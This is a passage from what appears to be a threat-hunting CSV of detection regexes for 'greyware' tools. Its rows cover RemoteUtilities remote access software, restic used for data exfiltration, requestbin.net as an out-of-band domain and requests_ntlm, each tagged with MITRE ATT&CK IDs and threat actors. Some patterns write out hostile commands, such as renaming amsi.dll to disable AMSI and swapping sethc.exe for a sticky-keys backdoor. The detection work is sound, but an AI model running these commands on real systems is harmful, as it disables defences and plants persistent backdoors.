- T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Logs\rut_log_*.html*",".{0,1000}\\Logs\\rut_log_.{0,1000}\.html.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Printers\Remote Utilities Printer\*",".{0,1000}\\Printers\\Remote\sUtilities\sPrinter\\.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\ProgramData\Remote Utilities*",".{0,1000}\\ProgramData\\Remote\sUtilities.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\remote utilities - host\*",".{0,1000}\\remote\sutilities\s\-\shost\\.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Remote Utilities - Host\*",".{0,1000}\\Remote\sUtilities\s\-\sHost\\.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\remote utilities agent\*",".{0,1000}\\remote\sutilities\sagent\\.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Remote Utilities Agent\Logs*",".{0,1000}\\Remote\sUtilities\sAgent\\Logs.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - 
MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Remote Utilities Files\rdp_connections\*",".{0,1000}\\Remote\sUtilities\sFiles\\rdp_connections\\.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Remote Utilities Server\*",".{0,1000}\\Remote\sUtilities\sServer\\.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Remote Utilities\Logs*",".{0,1000}\\Remote\sUtilities\\Logs.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Remote Utilities\MiniInternetId*",".{0,1000}\\Remote\sUtilities\\MiniInternetId.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\rfusclient.exe*",".{0,1000}\\rfusclient\.exe.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - 
MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\rutserv.exe*",".{0,1000}\\rutserv\.exe.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\rutview.exe*",".{0,1000}\\rutview\.exe.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ru-viewer-portable\*",".{0,1000}\\ru\-viewer\-portable\\.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\SOFTWARE\Usoris\Remote Utilities\*",".{0,1000}\\SOFTWARE\\Usoris\\Remote\sUtilities\\.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\spool\drivers\x64\rupd.*",".{0,1000}\\spool\\drivers\\x64\\rupd\..{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\System32\rupdpm.dll*",".{0,1000}\\System32\\rupdpm\.dll.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Two Pilots\Agent\Remote Utilities Printer*",".{0,1000}\\Two\sPilots\\Agent\\Remote\sUtilities\sPrinter.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\unidrv_rupd.dll*",".{0,1000}\\unidrv_rupd\.dll.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\unidrv_rupd.hlp*",".{0,1000}\\unidrv_rupd\.hlp.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\unidrvui_rupd.dll*",".{0,1000}\\unidrvui_rupd\.dll.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\unires_vpd.dll*",".{0,1000}\\unires_vpd\.dll.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote 
Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\viewer-portable-7.2.2.0\*",".{0,1000}\\viewer\-portable\-7\.2\.2\.0\\.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\VPDAgent.exe*",".{0,1000}\\VPDAgent\.exe.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Product: Remote Utilities - Host -- *",".{0,1000}\Product\:\sRemote\sUtilities\s\-\sHost\s\-\-\s.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote Utilities - Host*",".{0,1000}\Remote\sUtilities\s\-\sHost\<\/Data\>.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote Utilities Server<*",".{0,1000}\Remote\sUtilities\sServer\<.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - 
TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Removed Remote Utilities - Host.*",".{0,1000}\Removed\sRemote\sUtilities\s\-\sHost\.\<\/Data\>.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>Installed Remote Utilities - Viewer.*",".{0,1000}\>Installed\sRemote\sUtilities\s\-\sViewer\..{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>Installed Remote Utilities Server.Installed\sRemote\sUtilities\sServer\.\<\/.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>Product: Remote Utilities - Viewer -- *",".{0,1000}\>Product\:\sRemote\sUtilities\s\-\sViewer\s\-\-\s.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>Product: Remote Utilities Server -- *",".{0,1000}\>Product\:\sRemote\sUtilities\sServer\s\-\-\s.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - 
T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>Remote Utilities - ViewerRemote\sUtilities\s\-\sViewer\<\/.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*InternetIdService.exe*",".{0,1000}InternetIdService\.exe.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Program Files (x86)\Common Files\Two Pilots*",".{0,1000}Program\sFiles\s\(x86\)\\Common\sFiles\\Two\sPilots.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Remote Utilities Pty (Cy) Ltd.*",".{0,1000}Remote\sUtilities\sPty\s\(Cy\)\sLtd\..{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*RemoteAdmin.RemoteUtilities*",".{0,1000}RemoteAdmin\.RemoteUtilities.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - 
TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","#Avsignature","N/A","10","10","N/A","N/A","N/A","N/A" "*rfusclient.exe *",".{0,1000}rfusclient\.exe\s.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*rutserv.exe *",".{0,1000}rutserv\.exe\s.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*rutserv.exe /*",".{0,1000}rutserv\.exe\s\/.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*rutview.exe *",".{0,1000}rutview\.exe\s.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*rutview.exe -*",".{0,1000}rutview\.exe\s\-.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*server.remoteutilities.com*",".{0,1000}server\.remoteutilities\.com.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Trojan.RemoteUtilitiesRAT*",".{0,1000}Trojan\.RemoteUtilitiesRAT.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","#Avsignature","N/A","10","10","N/A","N/A","N/A","N/A" "*Uninstall Remote Utilities - Viewer.lnk*",".{0,1000}Uninstall\sRemote\sUtilities\s\-\sViewer\.lnk.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Uninstall Remote Utilities Server.lnk*",".{0,1000}Uninstall\sRemote\sUtilities\sServer\.lnk.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Uninstall Remote Utilities.lnk*",".{0,1000}Uninstall\sRemote\sUtilities\.lnk.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*update.remoteutilities.net*",".{0,1000}update\.remoteutilities\.net.{0,1000}","greyware_tool_keyword","RemoteUtilities","RemoteUtilities Remote Access softwares","T1021 - T1083 - T1113 - T1218.007 - T1105 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","RagnarLocker - MuddyWater","RMM","https://www.remoteutilities.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*ren C:\Windows\System32\amsi.dll *.dll",".{0,1000}ren\sC\:\\Windows\\System32\\amsi\.dll\s.{0,1000}\.dll","greyware_tool_keyword","ren","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin","1","0","N/A","N/A","10","8","N/A","N/A","N/A","N/A" "*ren sethc.exe sethcbad.exe*",".{0,1000}ren\ssethc\.exe\ssethcbad\.exe.{0,1000}","greyware_tool_keyword","ren","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*ren sethcold.exe sethc.exe*",".{0,1000}ren\ssethcold\.exe\ssethc\.exe.{0,1000}","greyware_tool_keyword","ren","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*ren sethcold.exe sethc.exe*",".{0,1000}ren\ssethcold\.exe\ssethc\.exe.{0,1000}","greyware_tool_keyword","ren","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - 
TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*.d.requestbin.net*",".{0,1000}\.d\.requestbin\.net.{0,1000}","greyware_tool_keyword","requestbin.net","allows users to create a unique URL to collect and inspect HTTP requests. It is commonly used for debugging webhooks - it can also be abused by attackers for verifying the reachability and effectiveness of their payloads","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","http://requestbin.net","1","1","N/A","Out of band interaction domains","10","10","N/A","N/A","N/A","N/A" "*http://requestbin.net/r/*",".{0,1000}http\:\/\/requestbin\.net\/r\/.{0,1000}","greyware_tool_keyword","requestbin.net","allows users to create a unique URL to collect and inspect HTTP requests. It is commonly used for debugging webhooks - it can also be abused by attackers for verifying the reachability and effectiveness of their payloads","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","http://requestbin.net","1","1","N/A","Out of band interaction domains","10","10","N/A","N/A","N/A","N/A" "* install requests_ntlm*",".{0,1000}\sinstall\srequests_ntlm.{0,1000}","greyware_tool_keyword","requests-ntlm","HTTP NTLM Authentication for Requests Library","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://pypi.org/project/requests-ntlm/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "*from requests_ntlm import HttpNtlmAuth*",".{0,1000}from\srequests_ntlm\simport\sHttpNtlmAuth.{0,1000}","greyware_tool_keyword","requests-ntlm","HTTP NTLM Authentication for Requests Library","T1003 - T1547.005 - T1055 - T1557","TA0008 - TA0006","N/A","N/A","Credential Access","https://pypi.org/project/requests-ntlm/","1","0","N/A","N/A","8","9","N/A","N/A","N/A","N/A" "* -r rclone:* init*",".{0,1000}\s\-r\srclone\:.{0,1000}\sinit.{0,1000}","greyware_tool_keyword","restic","backup program 
used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "* restic.exe*",".{0,1000}\srestic\.exe.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "* restic/restic *",".{0,1000}\srestic\/restic\s.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*/restic-*.tar.gz*",".{0,1000}\/restic\-.{0,1000}\.tar\.gz.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","1","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*/restic.exe*",".{0,1000}\/restic\.exe.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","1","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*/restic/releases/download/*",".{0,1000}\/restic\/releases\/download\/.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","1","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*/restic_*_windows_amd64.zip*",".{0,1000}\/restic_.{0,1000}_windows_amd64\.zip.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","1","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*/restic-master/*",".{0,1000}\/restic\-master\/.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","1","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*\restic-*.tar.gz*",".{0,1000}\\restic\-.{0,1000}\.tar\.gz.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*\restic.exe*",".{0,1000}\\restic\.exe.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*\RESTIC_*_WINDOWS_AMD64.E-FC5783E7.pf*",".{0,1000}\\RESTIC_.{0,1000}_WINDOWS_AMD64\.E\-FC5783E7\.pf.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*\restic_*_windows_amd64.zip*",".{0,1000}\\restic_.{0,1000}_windows_amd64\.zip.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data 
exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*\restic-completion.ps1*",".{0,1000}\\restic\-completion\.ps1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*\restic-master\*",".{0,1000}\\restic\-master\\.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","N/A","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*031cf34eeafe09064a6b63bcf752093d742b89166e93924aa4dde13160f91301*",".{0,1000}031cf34eeafe09064a6b63bcf752093d742b89166e93924aa4dde13160f91301.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*03d40eba61566209bd634bde4492e7adcc34e8cfa94a6e2e72e0136c21534d8b*",".{0,1000}03d40eba61566209bd634bde4492e7adcc34e8cfa94a6e2e72e0136c21534d8b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - 